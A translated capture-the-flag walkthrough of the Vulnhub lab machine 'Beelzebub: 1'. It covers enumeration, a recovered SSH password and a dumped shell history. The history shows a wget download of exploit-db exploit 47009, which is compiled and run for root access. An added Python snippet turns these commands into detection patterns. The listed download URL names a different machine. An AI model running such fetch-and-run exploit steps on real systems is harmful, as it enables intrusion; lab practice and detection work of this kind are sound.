Vulnhub Practice Notes (BEELZEBUB: 1)

author:AILX10
  • English name: BEELZEBUB: 1
  • Chinese name: Beelzebub: 1
  • Published date: September 8, 2021
  • Difficulty: Easy
  • Description: You have to enumerate as much as you can, and don't forget Base64.
  • Download: https://www.vulnhub.com/entry/empire-breakout,751/

1. Boot information, know the username (krampus)

[Screenshot: boot information]

2. Host discovery (192.168.199.146)

[Screenshot: host discovery]

3. Port scanning (22, 80 ports)

[Screenshot: port scanning]

4. Check the web page

[Screenshot: web page]

5. Scan the directories

dirb http://192.168.199.146/
or
dirsearch -u http://192.168.199.146/

[Screenshot: directory scan]

6. Visit the index home page

[Screenshot: index home page]

View the source of the index home page to get a clue

<!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5-->

[Screenshot: source code of the index home page]
7. Compute the MD5 hash of beelzebub

└─# echo -n 'beelzebub'|md5sum|cut -d ' ' -f1
d18e1e22becbd915b45e0e655429d487

[Screenshot: MD5 calculation]

8. Try to access the link, but the request is redirected with a 301

[Screenshot: suspected WordPress site]

9. Enumerate the directory; the results confirm that it is a WordPress site

dirsearch -u http://192.168.199.146/d18e1e22becbd915b45e0e655429d487/

[Screenshot: directory enumeration]

10. Try to access uploads

[Screenshot: uploads]

Click "talk to valak"

People who sign a contract sometimes try to outwit the devil, but in the end they fail.

[Screenshot: talk to valak]

11. Analyze the request with Burp and obtain the password M4k3Ad3a1

[Screenshot: Burp analysis]

12. Try SSH login

[Screenshot: SSH login]

13. Successfully obtain the normal user's flag

[Screenshot: normal user flag]

14. Look for clues (.bash_history)

krampus@beelzebub:~$ ls -la
total 104
drwsrwxrwx 17 krampus krampus  4096 Mar 20  2021 .
drwxr-xr-x  3 root    root     4096 Mar 16  2021 ..
-rw-------  1 krampus krampus  1407 Mar 20  2021 .bash_history
drwx------ 11 krampus krampus  4096 Mar 20  2021 .cache
drwxrwxrwx 14 krampus krampus  4096 May 26  2020 .config
drwxrwxrwx  3 krampus krampus  4096 Oct 20  2019 .dbus
drwxrwxrwx  2 krampus krampus  4096 Mar 19  2021 Desktop
drwxrwxrwx  2 krampus krampus  4096 Apr  8  2020 Documents
drwxrwxrwx  2 krampus krampus  4096 Mar 19  2021 Downloads
drwxrwxrwx  3 krampus krampus  4096 Oct 20  2019 .gnupg
drwxrwxrwx  2 krampus krampus  4096 Oct 20  2019 .gvfs
-rwxrwxrwx  1 krampus krampus 12844 Mar 20  2021 .ICEauthority
drwxr-xr-x  3 krampus krampus  4096 Mar 19  2021 .local
drwxrwxrwx  5 krampus krampus  4096 Apr  2  2020 .mozilla
drwxrwxrwx  2 krampus krampus  4096 Oct 20  2019 Music
drwxrwxrwx  2 krampus krampus  4096 Oct 21  2019 Pictures
-rwxrwxrwx  1 krampus krampus   807 Oct 20  2019 .profile
drwxrwxrwx  2 krampus krampus  4096 Oct 20  2019 Public
-rwxrwxrwx  1 krampus krampus    66 Oct 20  2019 .selected_editor
-rw-rw-r--  1 krampus krampus    83 May 26  2020 .Serv-U-Tray.conf
-rwxrwxrwx  1 krampus krampus     0 Oct 20  2019 .sudo_as_admin_successful
drwxrwxrwx  2 krampus krampus  4096 Oct 20  2019 Templates
drwxrwxrwx  2 krampus krampus  4096 Oct 20  2019 Videos
-rw-rw-r--  1 krampus krampus   173 Mar 20  2021 .wget-hsts           

15. View history

krampus@beelzebub:~$ cat .bash_history 
mysql -u root -p
clear
su root
clear
lks
ls
clear
nano /etc/host
nano /etc/hosts
su root
su root
rm -rf sudo-1.9.6p1 sudo-1.9.6p1.tar.gz wordpress-5.3.2.zip 
su root
clear
exit
chmod 0750 html/
ifconfig
cd /var/lib/mysql/
clear
ls
cd wordpress/
sudo su
su root
clear
ls
cd Desktop/
clear
ls
cat user.txt 
clear
uname -a
sudo -1
sudo -i
clear
uname -a
sudo -i
find / -prem -u=s -type f 2>/dev/null
find / -prem -u=s -type f 2>/dev/null
cat /etc/issue
sudo -l
cd
cd ../
cd ../../../../
clear
find / -prem -u=s -type f 2>/dev/null
cd /usr/local/Serv-U/
ls
cd
clear
ps -aux
ps -a
ps -a -U root
ps -a -U root | grep 'Serv'
ps -U root -au
ps -U root -au | sort -u
clear
cd /tmp/
clear
find / -prem -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
clear
find / -perm -u=s -type f 2>/dev/null
clear
wget https://www.exploit-db.com/download/47009
clear
ls
clear
mv 47009 ./exploit.c
gcc exploit.c -o exploit
./exploit 
cd ../../../../../../../
ls
cd cd
cd
grep -r 'beelzebub'
grep -r 'love'
cd .local/share
clear
ls
cd Trash/
ls
cat info
cd info
ls
ls -la
cd ../
clear
cd ../
ls
rm -rf Trash/
clear
su root
history -R
history -r
mysql -u root -p
clear
su root
clear
lks
ls
clear
nano /etc/host
nano /etc/hosts
su root
su root
rm -rf sudo-1.9.6p1 sudo-1.9.6p1.tar.gz wordpress-5.3.2.zip 
su root
clear
exit
history
clear
cd
clear
ip link
su root
clear
ls
history
clear
ls
cd /tmp/
ls
su root
exit
clear           
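
Read from the defender's side, the history above is a forensic record: privilege probing, SUID enumeration, a downloaded exploit, a local compile, then cleanup. The triage sketch below is an added example, not part of the original write-up; the rule names and regular expressions are this example's own heuristics, and SAMPLE is an excerpt of the commands shown above.

```python
import re

# Heuristic rules (assumptions of this example, not a standard rule set).
RULES = [
    ("privilege_probe",  re.compile(r"^(su(\s+root)?|sudo\s+(su|-i|-l))\s*$")),
    ("suid_enumeration", re.compile(r"\bfind\b.*-perm\s+\S*(u=s|[24]000)")),
    ("exploit_download", re.compile(r"\b(wget|curl)\b.*exploit-db\.com/download/\d+")),
    ("local_compile",    re.compile(r"\b(gcc|cc|clang)\b.*\s-o\s")),
    ("cleanup",          re.compile(r"^rm\s+-rf\b")),
    ("history_option",   re.compile(r"^history\s+-[a-zA-Z]")),
]

# Excerpt of the .bash_history shown above, in its original order.
SAMPLE = """\
sudo -l
find / -prem -u=s -type f 2>/dev/null
cd /usr/local/Serv-U/
ps -a -U root | grep 'Serv'
find / -perm -u=s -type f 2>/dev/null
wget https://www.exploit-db.com/download/47009
mv 47009 ./exploit.c
gcc exploit.c -o exploit
./exploit
rm -rf Trash/
su root
history -r
"""

def triage(history_text):
    """Return (line_no, label, command) for every command matching a rule."""
    hits = []
    for no, raw in enumerate(history_text.splitlines(), 1):
        cmd = raw.strip()
        for label, rx in RULES:
            if rx.search(cmd):
                hits.append((no, label, cmd))
    return hits

def chain_detected(hits, chain=("suid_enumeration", "exploit_download", "local_compile")):
    """True if the labels in `chain` occur in that order (other hits may interleave)."""
    labels = iter(label for _, label, _ in hits)
    return all(any(lab == want for lab in labels) for want in chain)

if __name__ == "__main__":
    for no, label, cmd in triage(SAMPLE):
        print(f"{no:>3}  {label:<17} {cmd}")
    print("escalate:", chain_detected(triage(SAMPLE)))
```

The mistyped `find / -prem` attempts do not match the SUID rule, so a rule set meant for real triage would need looser matching than these exact patterns.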

16. Following the hints in .bash_history, complete the privilege escalation and obtain the root flag

[Screenshot: reproducing the steps]

At this point, the experiment is complete~

Posted on 2022-08-22 21:46